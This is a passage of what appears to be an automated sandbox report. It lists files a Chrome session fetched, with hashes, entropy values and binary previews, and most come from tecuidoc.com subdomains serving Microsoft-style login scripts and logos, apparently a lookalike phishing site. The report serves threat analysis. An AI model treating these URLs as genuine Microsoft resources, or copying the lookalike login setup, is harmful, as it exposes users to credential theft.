                                              Preview:...........W.s.6....B.........ewm......].qB...|..a..}..M0!]...[.Az.?..J...y.^#.....{w.C..P.....u.....E.....v.S..0.F,...C.h..GB"....XS."....h$E..X..J.B!S...4.3T.s2@.,...uJ>.`....m".9|.h.f."..k-..\Q...J4.02A.H..H#I.eSp..X.p...)..HH=Y...L.*.f.QYq.~..08...'$..1N i.#x8..X.3..c@Z..H....a|..n..~...9.!H..si**.&.0D..%..R&vD.b.P...%..;...%.....Q.:.#......ETi..44.Z.3.....B7J...P.V..{..W...[..c.*..LO...)IX .ODT.D2.....-d..?v/>{7j..iY...$C.....3.9..p.....p.0d..@.K....?J.......jF.1&...Tq{.....u..5)^].......fk.pb.*j...t?...6+.J..G..bx.\..J..S.l....u...7.-.....m..pY[..}.1....~".s./..t.+5.t.C..[|C}..3......6....Xr..%..0P............U.......n.K..n..&Z.>...:.v}7._Q..I.L$.d.".{0..S../r+.q."i....c..W.B..I'.N(...U{qZCO..4l{S..q...\.4l...@D....&.>.d"...Z;..]..s|..!.......D....U ...?.aL....?./...`^.V..'....i3....*...}.90TU;X..z.I#?.0?.u....u.ExLU9..R9.......~@.dH..:......a..h..V..Je.V.c>v.......z.F.k....`..W..j.G.C|.G.........._N..Nv`.8.E`j...`v."..>...)bA{.....<v
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                              Category:downloaded
                                              Size (bytes):2279
                                              Entropy (8bit):7.354295352983905
                                              Encrypted:false
                                              SSDEEP:24:sb8IQUm7Ar/pPwZRbiHGIc+CozPPdv4CA0H+9dCjnmLr7laO+If7xkLLVP:sbvmiRwZUmD+CoTU0HbEXRzxkLBP
                                              MD5:7E0D59593F3377B72C29435C4B43954A
                                              SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                              SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                              SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                              Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 3651
                                              Category:downloaded
                                              Size (bytes):1435
                                              Entropy (8bit):7.860223690068481
                                              Encrypted:false
                                              SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                              MD5:DF6A7721C242813411CC6950DF40F9B3
                                              SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                              SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                              SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://signup.tecuidoc.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg
                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 29024
                                              Category:downloaded
                                              Size (bytes):7221
                                              Entropy (8bit):7.960879881998273
                                              Encrypted:false
                                              SSDEEP:96:joLS/cKPJuGbwndhu6+HyRx8AToAQ7Fd2B2Egaz03g3uEgVdvQzOOhZW6n4X3OZU:joIPJdSdsxn7e3d0x5QzOOhF4X+bqg10
                                              MD5:B43C45F63897983EAD2CDCD749065A14
                                              SHA1:7207A4526156231DDA98388642BC93B9037BDF71
                                              SHA-256:AEA41AFDFD7DE110EF20C7AC8F5F00BB42E609545E63AB9748DCE1175211A877
                                              SHA-512:00CBCEF255B84B8B4FC52F8D5AA0DC41234D217220B4993DC9AE3B4B2F4BA60BEF49142413A55FB4ED5176D0851531AD3A4B13CF3B62044AA8D842C99537F853
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/lwsignupstringscountrybirthdate_en-us_gdxUIqa3ijrOefuBnwhTKg2.js?v=1
                                              Preview:...........\.r.Hr}.W`iG........Z.$.-.....1Q.J$F ...8...?..~p.....'..g.."......tS@VU......?.....}..WO.m?..D.....|U...r..e...C.%<i...v.....<...._+..9..^.me..}.v..8...&..+.+r-l.&.?q.}....I.. .Y)WRqC_1.p..^VX..Vy.../fdm.Q8.u.k_heA.....`%.:..b.).Wk.:...E.7.<4..0.q...g..0..N...e$j.....uh|R..EM...r...G....../\.u.%\..-......f......?..5....5.$..C?....>..j$......|...o...Q...!.G.84....p......p.k.....<.Lb.H..k.W.]$.r$.o....!.^.F.yml.......ua...b).*.....(=.~...j....0?_...pq_.........Y..)_...0M....l...2..|..k..}o<..O.O.k..p.a....|t....TzY.vd....t..<8e.9u....7B..#...x.n..g.,.m...5.?.lR..}.e..;....,.....8.....uTq..G..{.%af0..q..W.A.woP........&....^W.4...r...I.....C.$p$q...O..,.q..L..8j.%.d.\.....sM.k....1V..@...;0.tR.$^...V...+A.|......;.b.....\......z.._.......`I......D.@.A.G.F.....$'....n.d...^\/...v......S*....+..j...<..}).H..B.R.Z...v..._)...6.Q.K.Y,...X..C....E`."G.SW..K.6.x.G.0Pw.YlS.3.;...{........ I>..8..1..1.i.Jr..<O....u..).H!O../..\o.' 0 ..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 96745
                                              Category:downloaded
                                              Size (bytes):33956
                                              Entropy (8bit):7.99273363665287
                                              Encrypted:true
                                              SSDEEP:768:REv+3CFsvVVuralTjrL3oP1zwKRc84AgzR1dh4D55Hq/36:+AV4rSfoPxwy4A8dhmEq
                                              MD5:AB8EA470698D59B97FEA7281FF3003CC
                                              SHA1:1A798D78128AB0C0A3344D4E89BEA5FA4B833767
                                              SHA-256:C37BAE15F430ED1B11382E9EFBE9426287CA79CF7CEF54B5D29972A099251CD5
                                              SHA-512:B484F8CE1334B9EBD68BA948CA8AFF4B2A93FFF0564552ED91F8306595E62256FB99B47259FD3BC35C13700743BCCB55FF1100E9428021C29A448FABDEA49C75
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1
                                              Preview:............v.F./...BD.S...D;Iw@C<./....N...............g...?f.y.y.......e...9.K...v..>........u._.?...W.<Y...'...].....=.:/.Uptto>..X|....\|u.q.P.u2.f.YvqD%Q..t.\..b.U...x...........U<.V.yrv^..;>.......O.u:..$K}45...~V....,K.<y......9^.Q.....zMe._|.z.....^}....7..7;zU}.o.Ge.p....zx|...~....E...z.u:C.../..}.O...eD}...2N..s?.g.^..n...:O..IR.....#=....0..4.....A9...N...C.....8=.?8p..yI....8.Rh$[....1.9..'.~.mM.....I<.o.V..hv......U.m6..o.4.n.I:.{.[./.Z...s?.n..K.E.Y.*i.#jO..../0...V2...p.e....u .b.F....spP.P...r2.;7.lp5 ..yO.. .H.hr.4Po..6.WW...`..\...<.......Q#.......7N.=....N@..,[.]'{.>...\..z.c...\...9.L........(.4P7........y..V4.....h#..7.s..SR.k.faDK...2.3.....{^@..lo..V9....v.1A.........k..'..L...K.M.S..C..t.....p...7..)....!....D....[..Ph.%v@N%'.4p.6..8T%....eR..C..P.G.,wG.......)..|RN..tK.M.....{r.*..d(.....[. .U..........T.&KyRiw..c.ST.W.,/.......&...|d$2.j.......|.lR..<d....Y.$t.C....x..f......;C.......8...F{\U<8...`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 113689
                                              Category:downloaded
                                              Size (bytes):35841
                                              Entropy (8bit):7.993649486132517
                                              Encrypted:true
                                              SSDEEP:768:BGaB7E1M0zEnofCXE3VW5x/R5MYItalixqI/2M6OezuZj:gh1M9nvE+x55MUlfI+MLezuZj
                                              MD5:7679C451B730729D4271B0F5BF79C351
                                              SHA1:82DD400CF017F009897D3117FD8D683C5F11B3FA
                                              SHA-256:9F73456783B255FA3C0D6A14B832E6B3738BB9B9F33E0F5677D530766CC33A12
                                              SHA-512:9B7534EEA2F4DFCB03B0EFBDCF4536ED02E29660EB0EDE8CE9EBFDDBB78330A759BD793B084C178F2E2C933DBAD7C5C40A8B3BE7A0BA4C4E4765DBB9C4F9CDA2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_eb638da25d4055fbbb57.js
                                              Preview:...........{..8.(.........,.-.......gglu.. .m..I....~..oRv......i.(....P(......k............o.6>.|..d..........O...V..}.G..4......9.l..F.mDI.f.4...o,..EA.1...F1g..,...E..Gy...,No6.@..l....n..;....P.fQ...ty...b#I.(d.A2!j1$..m....6n.Q8.x..Y...b#c!....|.p..w#..F..i..s.Gc..b..9U.k......&@pJ..'40J......e.$.k.L(b...F.n.+..nO..6@n...A.&.,LVa......Y......V..o..% ....,......:..e.-XR. <FE.w..b..P......r.b.["~..!.....y.......V...4.;M..Y.X.{..........h...0].N..,.rhCx........_w..y..\h{..Vc`e.$].Q"+}gv.+....nx.. ..`..D9...;Mp.....M.L`X..2./...Z.k`...#..\....y.?r.v....*..Yu..n.|.......M...d...9...S.:/.....Qr.M..u...2..l...2.._B.A..i.rV......#..O..y..fY.....FL._..4.D\.G!L..]0c..k.`.....&*.9....6...R..O..^..Q.P.<6.....*....]......,..wh...#/b.bOV.8.w.9K..l...].=.5.m.k....e.8h.$/`V.."...........<..o.}.....P..=...q....Q.)?...D@Ho....mj..D.0.S.f..l*f...@47.]..a..U.(....O.....C.q...f.o...-j..Z.Z.W....t....7.U.....OK1.NV.c.>./%.G..*.Z'........f....%Tc.....M.P.+....r.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):28
                                              Entropy (8bit):4.307354922057605
                                              Encrypted:false
                                              SSDEEP:3:8Kiun9ks:8Kiun2s
                                              MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                              SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                              SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                              SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                              Malicious:false
                                              Reputation:low
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwlkx8fSSeVSZBIFDdFbUVISBQ1Xevf9?alt=proto
                                              Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 8111
                                              Category:downloaded
                                              Size (bytes):3505
                                              Entropy (8bit):7.945008338787512
                                              Encrypted:false
                                              SSDEEP:96:siS8LmnrKD6nrzRydFgkoVfemimQY/W+X:siarzrzR04GmP7/fX
                                              MD5:90987734D7B52E97DB2CE6CC62343784
                                              SHA1:9E84FA0EC990B892B0F8413356AE087DE7E9EBBD
                                              SHA-256:D76ED433CD8BBB84C57F4BF6273956D762ED57E0A49ABFFF09BBA6025CF0AD7B
                                              SHA-512:591166764C037D61C3D478205BEC7A82A694801927C3A029881EB81A72530DD5FB0B03264618E19A82FDFBD009AC0507909BE3DB528C7C8CCB82678279A452D4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js?v=1
                                              Preview:...........Y[s.6.~..Q.L.`FI...D..q..c+....$$1.I..-+...~..M....N......~..&e..(MlgY.Z....U.U.c..n.|%..{=[.Y...7..JH.......!...O..1....7.......>..'e....!0...>1.M.......s+..^>...Z..q9...M ..[..(e.^o..[.z...`.Z.$L.n!.8..i..)/..=wG...D...w....C.,.*...m....I.....K........9. |.a#;u......* ....5..+I..AeV&.0J..F..$.......V...!..RK...F.\..\.. .8.07...{$......h...O8..Jw[..Y6..Qh..`.(...K...8..09P..#.,`..f.qI..|...{.h....pm.\.m.&.s...tI@....Y.m.sg.x.j.og]..+.AY6.&.8...7.5..Y.$...Z....6....w.f.d..Q.LV..3qTh....X5Ih.%....j..tb..kfB..o..;....3...8C...l.:.W..jF...1!..5..~/.j....t....3.......e..:".9........_.,.h..<.. .x..9.HD...1...w..Kq..Q^FW....VA'K.&..<.H.3l..>........M.....t.._....+B ..e6jK..A. ..+9...nRX.M.....\.....b...j55<..X...U...U0S...we..8.kY...@&._.......;h.e.=..&.H.e.d...;%.R.YH...tg~.a.|....E..p..Q.Gj.T;.....'3.iQP....m..U.......KC..k.b0...w...z...9r[..R.h....K?.#.....e.!..5y.....s....*G.oa.;..:...*.........H......._Y&.W...X.u.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:MS Windows icon resource - 6 icons, 16x16 with PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, 24x24 with PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced, 32 bits/pixel
                                              Category:downloaded
                                              Size (bytes):2279
                                              Entropy (8bit):7.354295352983905
                                              Encrypted:false
                                              SSDEEP:24:sb8IQUm7Ar/pPwZRbiHGIc+CozPPdv4CA0H+9dCjnmLr7laO+If7xkLLVP:sbvmiRwZUmD+CoTU0HbEXRzxkLBP
                                              MD5:7E0D59593F3377B72C29435C4B43954A
                                              SHA1:B4C5C39A6DFB460BBD2EACCEB09EC8079FB6A8E2
                                              SHA-256:62D706019A0D80173113EF70FBBEE12F286E8E221534BE788448AADA4B14C8E8
                                              SHA-512:397416A6A96A39F46F22E906A60E56067E5B7B11FB0597A733F862FC077C88D5ED31F51A82709A56F6082FB1F2F72F9A0FE0849E3DD493BB4240C265B546AAD3
                                              Malicious:false
                                              Reputation:low
                                              URL:https://bd6a002d-7d4f53f3.tecuidoc.com/images/favicon.ico?v=2
                                              Preview:............ .....f......... .$...|... .... .5.......00.... .j.......@@.... .....?......... .....2....PNG........IHDR................a....IDATx..1NCA.C..D@."-en.!.h..8@..9h..".....5M....h..-..l..L..P.Y.^luw...r.(.........w...B({....&.F......N.f%..........^&.x}Zu........g..7m......n?..U`....@.M8.g.-..|..S.K.!....].%.I......&.I..`...F |o;....{S....|..VL...E*....IEND.B`..PNG........IHDR..............w=.....IDATx..AJ.A.E_.5...D..$'....<.g.\...!.].!..Y....4...B.......4U...Q..J(...y....%..[t;..>\...~....O....r......e...F....8.d9....4.x.x*W..e...c...~W..P2.........[.....r<..,..>....q.\...U...v.'......!.1.....9..:8............I.I.d.......IEND.B`..PNG........IHDR... ... .....szz.....IDATx..AJC1.E.{..... .;..>\..q+.. ..N.j....."8k.P..IF...M..{.8..F..Z.q...~.y}...0.f..U....Z...@yd...4......DT.B..)......v.8.....)..Lq.[....]_jrG$...3.%......i.vU...C...h0.....rz^.].....9..5.....mU~.E..GMF.X....?..Y.U..|.c.k.v>..@.h..........Nh.u......IEND.B`..PNG........IHDR...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, original size modulo 2^32 3651
                                              Category:dropped
                                              Size (bytes):1435
                                              Entropy (8bit):7.860223690068481
                                              Encrypted:false
                                              SSDEEP:24:XvstSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcN:Xv7DkpyVCGca4b//9z5oPXdbl9688qRU
                                              MD5:DF6A7721C242813411CC6950DF40F9B3
                                              SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                              SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                              SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                              Malicious:false
                                              Reputation:low
                                              Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 55071
                                              Category:downloaded
                                              Size (bytes):15799
                                              Entropy (8bit):7.985166787359103
                                              Encrypted:false
                                              SSDEEP:384:TwXl87i4naaFtPESJ2DWOq1IcQS0SL7EOONPk:TwXW7i4naTSOAszOG8
                                              MD5:F4EE642A98C21CF56B3D4E6A248BEC15
                                              SHA1:97BC88C4C9048E09547D32840AC309250D38E7BF
                                              SHA-256:B7F749990B9F16129FBBD6088E467367676F2183A19FC00A0FFFE9AAE72C6556
                                              SHA-512:12BECEFA607259C9A2F636C478137E8A658E28E399E954915A35ECB309D03849A57E33E7A1A4627CD5577B3A97F84B254190832DCCEA4DE76B043AB9A9481F07
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_l2bvdjfwt697xziuhxpwsg2.js
                                              Preview:...........}Ms#G.....uh.O=.>...4..p.O$...P.IF4.".K....1..5.......7.|.....S6..w8?......9...B.AwUeeeeeefee..f.Oc/._..G.............{..._..%.q..q........j<.w..O.7..."pgbV.C..k.T`..X....'v....<p....I.'..k<j@Ai..NP.6<..j..N.....0.......=..ox/+...9.sB..p.q.ai...?.....qw.D.X..b..?.bOD.x.B1..X..`.N..b..E...%JWg..x8.ys..:...I.....b1...q.......[..a..7q..N........._..4....&.. ........m&6.F.\.@.e.B..`.'.....0............]/.........`..iZ6......./f8..BCz_...i....MQ>..E,/x>v......{.........._.........Z.rP+......*e..R.\.Z.u..3@./.oJ7.'.......%.;.WP.9.b..z._..b....0......X...Ro^k*.lI..t..K7~.ep.`.)......'."".."....../..S....M..B5nEc2..g..m..|f.{...pbi(.0.@[_Lc.Z.....U`./!..@.....p.-..kQ@T..8...-...0.....AX.D.?...".....5.NE..\...VQa.....,......?..M.0......_<......C..fOq..bz'..z/BF.;&.K......%.....g........f!..^.:Z...g...j...7.._........S.2/.2.n.....>.<P!!.Bv..J........e!d....B.Ra$.......N........> f.C.....^.D.-.e.c+...............!....$.9x...{.....p~._.0.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:GIF image data, version 89a, 352 x 3
                                              Category:dropped
                                              Size (bytes):2672
                                              Entropy (8bit):6.640973516071413
                                              Encrypted:false
                                              SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                              MD5:166DE53471265253AB3A456DEFE6DA23
                                              SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                              SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                              SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                              Malicious:false
                                              Reputation:low
                                              Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:downloaded
                                              Size (bytes):64
                                              Entropy (8bit):4.621671884241178
                                              Encrypted:false
                                              SSDEEP:3:InAioSmhSqSLPpdioi1KY:jomoVvFi1KY
                                              MD5:A82B43EF73C5F7342B7FB2AF895F48BB
                                              SHA1:13B909ADAF0EDABB6A64BA3B61FA39AD27FDF7E9
                                              SHA-256:58D9B980FAA41D8C9025800E63D37043D085CA5F41429B6504C2F667E66C3CF8
                                              SHA-512:7FBF138FD6418B5790261EB1C727183D26F5B2055F55BD5EC0186574A3B800B5604012E806894689755A15A54088BDBC2F1A37FBEA8C880CB5B820CAB80A95C4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSLAlEYD_U5GmZ1BIFDXU0vqESBQ39KmurEgUNHuw8YxIFDfG91xoSBQ1GqIRz?alt=proto
                                              Preview:Ci0KBw11NL6hGgAKBw39KmurGgAKBw0e7DxjGgAKBw3xvdcaGgAKBw1GqIRzGgA=
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:GIF image data, version 89a, 352 x 3
                                              Category:downloaded
                                              Size (bytes):2672
                                              Entropy (8bit):6.640973516071413
                                              Encrypted:false
                                              SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                              MD5:166DE53471265253AB3A456DEFE6DA23
                                              SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                              SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                              SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                              Malicious:false
                                              Reputation:low
                                              URL:https://7e55e394-7d4f53f3.tecuidoc.com/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                              Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 2405
                                              Category:downloaded
                                              Size (bytes):1159
                                              Entropy (8bit):7.803898219369731
                                              Encrypted:false
                                              SSDEEP:24:X7v5qfYi+kyJekaHOf+hiZIKa+soPY48cobFPH8pgxkFDNx:X7v5Wx+kkekaJiZIKo0h8coZFSDNx
                                              MD5:C3B644F095BEDC9B3BF09249DA80282C
                                              SHA1:FC4D9D91DB093E5C060D3230EA85B23FF5A26BAC
                                              SHA-256:6495664C48CA4883549125587B28BDB8B43C8297D70B2A3641266845BA87C139
                                              SHA-512:E3D31F33DA79E632067BA3189D3BF0062BD817A872B1243875DB265458D638E2D2D95DB6BA79E1A257C90635A5245130AD9C1116A4DF3BCC79BAC2B5CEBE366C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://l1ve.tecuidoc.com/Me.htm?v=3
